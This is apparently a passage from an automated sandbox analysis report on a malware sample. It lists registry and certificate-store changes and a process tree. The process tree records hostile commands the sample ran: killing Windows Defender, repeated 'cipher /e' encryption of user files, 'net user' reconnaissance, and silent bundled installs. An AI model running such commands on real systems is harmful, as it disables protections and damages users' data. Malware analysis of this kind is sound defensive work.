| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86} | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\CLSID = "{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{860BB310-5D01-11d0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4aa8-BFA9-4B196644964C} | C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\psiphon\shell\open | C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\FriendlyName = "DroidCam Source 2" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C} | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\DevicePath = "droidcam:2" | C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\ = "DroidCam Source 2" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\FilterData = 02000000000060000100000000000000307069330800000000000000010000000000000000000000307479330000000038000000480000007669647300001000800000aa00389b7100000000000000000000000000000000 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\ = "DroidCam Source 2" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_Classes\Local Settings | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\psiphon\shell | C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\FilterData = 02000000000060000100000000000000307069330800000000000000010000000000000000000000307479330000000038000000480000007669647300001000800000aa00389b7100000000000000000000000000000000 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\DevicePath = "droidcam:2" | C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\psiphon\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\\bloatware\\3.exe\" -- \"%1\"" | C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32\ = "C:\\Program Files (x86)\\DroidCam\\lib\\DroidCamFilter64.ax" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\FriendlyName = "DroidCam Source 2" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{860BB310-5D01-11d0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4aa8-BFA9-4B196644964C} | C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\psiphon\shell\open\command | C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32\ThreadingModel = "Both" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32\ThreadingModel = "Both" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C} | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\psiphon\ = "URL:psiphon" | C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32\ = "C:\\Program Files (x86)\\DroidCam\\lib\\DroidCamFilter32.ax" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\CLSID = "{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_Classes\Local Settings | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\psiphon | C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\psiphon\URL Protocol | C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Program Files (x86)\DroidCam\lib\insdrv.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = … | C:\Program Files (x86)\DroidCam\lib\insdrv.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\SystemCertificates\REQUEST | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\SystemCertificates\ADDRESSBOOK\Certificates\0789B35FD5C2EF8142E6AAE3B58FFF14E4F13136\Blob = 0300000001000000140000000789b35fd5c2ef8142e6aae3b58fff14e4f13136180000000100000010000000021dfb9b16b1303a97b0bf78cda68e46190000000100000010000000d2ad89d215fd92fee49a4c3941f6764a140000000100000014000000932ca752938ca1308712e92885d692a8c4ba68510f00000001000000200000004d0948e616196706e4aed75a88243863a88ff351afc50d0f9e948353618c011e040000000100000010000000a58d756a52cdd9c0488b755d46d4df71200000000100000026050000308205223082040aa00302010202100aa099e64e214d655801ea38ad876711300d06092a864886f70d01010b05003072310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3131302f0603550403132844696769436572742053484132204173737572656420494420436f6465205369676e696e67204341301e170d3230303931303030303030305a170d3233313130323132303030305a305f310b30090603550406130243413110300e060355040813074f6e746172696f3110300e06035504071307546f726f6e746f31153013060355040a130c50736970686f6e20496e632e311530130603550403130c50736970686f6e20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a2903fcbeb078b484066cdac20fed2173f0d1e3651bc3f78c0b89cd9ad1d36ca07291b60264e08bbdc3f3a7c6391a55e806e96d00c6e476d096476aa6e99f841861e81799cb12ddd0f05ab79f7f4aa3796bdf4ce65897824d533fe733c36356c763139392bfa40699af1bd824a97e12ce1375931833eeecff55bec12762ac8cffd6b4c9c89172fb072fa675aac514f67f71069f11bfa82b344e592669db683eddaa655ab68dd38a01537e4616c96b285fa444ec74cd020479fd423765046fdfff218a63f647a2e0a41f1af02341143e26ea3805248675153539361a22022e96acb6f9a8bd1cc46050fc582f6aef5f03515a081d86107e0203e2f3fa403a8cef90203010001a38201c5308201c1301f0603551d230418301680145ac4b97b2a0aa3a5ea7103c060f92df665750e58301d0603551d0e04160414932ca752938ca1308712e92885d692a8c4ba6851300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330770603551d1f0470306e3035a033a031862f687474703a2f2f63726c332e64696769636572742e636f6d2f736861322d617373757265642d63732d67312e63726c3035a033a031862f687474703a2f2f63726c342e64696769636572742e636f6d2f736861322d617373757265642d63732d67312e63726c304c0603551d2004453043303706096086480186fd6c0301302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533008060667810c01040130818406082b0601050507010104783076302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304e06082b060105050730028642687474703a2f2f636163657274732e64696769636572742e636f6d2f446967694365727453484132417373757265644944436f64655369676e696e6743412e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101005dd2a32986111896351096581a68ca1073d27ac2c6f78d4b371457e616d7e7ee131828e23f0cc54b9e45fb53691a0687abcf4b642eff06628b340dd01e7d3718db0627e143fb1734f965e35857e4994f25c2d60dd92a263a4956cb14c3c105c32631abb2350156b2411fef84ac8125a94e41b6433d3b4e6d6b470e5b84ea91d4cffbf58eb7ad67b77fdc8289b8ca044a4375a32982ef1db8ee7b0067fdf616a9c383a57d67d72affb98b250a35d146be0cffcf248c11aad7c20c67dc1bd7eb5abad226918bf10c58189530408f52107e4c3715ae9ef42d0e88c8948ad2b35e1875841b979e40469d22d2be0df095dfd4be037ae5d46b340c6e8e6fa35f6c4a28 | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 | C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 | C:\Program Files (x86)\DroidCam\lib\insdrv.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\SystemCertificates\ADDRESSBOOK\Certificates\0789B35FD5C2EF8142E6AAE3B58FFF14E4F13136 | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 | C:\Program Files (x86)\DroidCam\lib\insdrv.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 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 | C:\Program Files (x86)\DroidCam\lib\insdrv.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 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 | C:\Program Files (x86)\DroidCam\lib\insdrv.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\phishing.url:favicon | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Runs regedit.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\ac3.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\Rover.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\vir.exe
"C:\Users\Admin\AppData\Local\Temp\vir.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\!main.cmd" "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K spread.cmd
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K doxx.cmd
C:\Windows\SysWOW64\PING.EXE
ping google.com -t -n 1 -s 4 -4
C:\Windows\SysWOW64\xcopy.exe
xcopy 1 C:\Users\Admin\Desktop
C:\Windows\SysWOW64\ipconfig.exe
ipconfig
C:\Windows\SysWOW64\xcopy.exe
xcopy 2 C:\Users\Admin\Desktop
C:\Windows\SysWOW64\net.exe
net accounts
C:\Windows\SysWOW64\xcopy.exe
xcopy 3 C:\Users\Admin\
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 accounts
C:\Windows\SysWOW64\net.exe
net user
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user
C:\Windows\SysWOW64\tasklist.exe
tasklist /apps /v /fo table
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im WindowsDefender.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K handler.cmd
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2856 CREDAT:275457 /prefetch:2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K cipher.cmd
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\Rover.exe
Rover.exe
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\web.htm
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\Google.exe
Google.exe
C:\Windows\SysWOW64\cipher.exe
cipher /e
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\helper.vbs"
C:\Windows\SysWOW64\PING.EXE
ping google.com -t -n 1 -s 4 -4
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2272 CREDAT:275457 /prefetch:2
C:\Windows\system32\efsui.exe
efsui.exe /efs /keybackup
C:\Windows\SysWOW64\cipher.exe
cipher /e
C:\Windows\SysWOW64\PING.EXE
ping mrbeast.codes -t -n 1 -s 4 -4
C:\Windows\SysWOW64\cipher.exe
cipher /e
C:\Windows\SysWOW64\cipher.exe
cipher /e
C:\Windows\SysWOW64\xcopy.exe
xcopy Google.exe C:\Users\Admin\Desktop
C:\Windows\SysWOW64\xcopy.exe
xcopy Rover.exe C:\Users\Admin\Desktop
C:\Windows\SysWOW64\xcopy.exe
xcopy spinner.gif C:\Users\Admin\Desktop
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K bloatware.cmd
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\regmess.exe
regmess.exe
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe
1.exe
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe
3.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\2.hta"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K SilentSetup.cmd
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\regmess_239e6675-cf83-4482-a135-4b30a903012e\regmess.bat" "
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe
WinaeroTweaker-1.40.0.0-setup.exe /SP- /VERYSILENT
C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp" /SL5="$102F6,2180794,169984,C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe" /SP- /VERYSILENT
C:\Windows\SysWOW64\reg.exe
reg import Setup.reg /reg:32
C:\Windows\SysWOW64\reg.exe
reg import Console.reg /reg:32
C:\Windows\SysWOW64\reg.exe
reg import Desktop.reg /reg:32
C:\Windows\SysWOW64\reg.exe
reg import International.reg /reg:32
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweaker.exe /f
C:\Windows\SysWOW64\cmd.exe
